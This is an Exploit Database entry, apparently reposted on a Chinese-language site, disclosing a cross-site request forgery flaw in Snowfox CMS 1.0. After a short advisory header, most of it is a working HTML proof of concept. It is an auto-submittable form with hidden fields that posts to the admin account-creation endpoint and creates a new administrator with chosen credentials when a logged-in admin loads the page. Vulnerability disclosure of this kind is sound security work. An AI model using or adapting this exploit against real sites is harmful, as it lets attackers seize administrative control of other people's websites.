Snowfox CMS 1.0 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 14 阅读

• 作者： LiquidWorm
  日期： 2014-11-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35301/

• <!--
  
  Snowfox CMS v1.0 CSRF Add Admin Exploit
  
  
  Vendor: Globiz Solutions
  Product web page: http://www.snowfoxcms.org
  Affected version: 1.0
  
  Summary: Snowfox is an open source Content Management System (CMS)
  that allows your website users to create and share content based
  on permission configurations.
  
  Desc: Snowfox CMS suffers from a cross-site request forgery
  vulnerabilities. The application allows users to perform certain
  actions via HTTP requests without performing any validity checks
  to verify the requests. This can be exploited to perform certain
  actions with administrative privileges if a logged-in user visits
  a malicious web site.
  
  Tested on: Apache/2.4.7 (Win32)
   PHP/5.5.6
   MySQL 5.6.14
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2014-5205
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5205.php
  
  
  
  12.11.2014
  
  -->
  
  
  <html>
  <body>
  <form action="http://10.0.18.3/snowfox/?uri=admin/accounts/create" method="POST">
  <input type="hidden" name="emailAddress" value="lab@zeroscience.mk" />
  <input type="hidden" name="verifiedEmail" value="verified" />
  <input type="hidden" name="username" value="USERNAME" />
  <input type="hidden" name="newPassword" value="PASSWORD" />
  <input type="hidden" name="confirmPassword" value="PASSWORD" />
  <input type="hidden" name="userGroups[]" value="34" />
  <input type="hidden" name="userGroups[]" value="33" />
  <input type="hidden" name="memo" value="CSRFmemo" />
  <input type="hidden" name="status" value="1" />
  <input type="hidden" name="formAction" value="submit" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>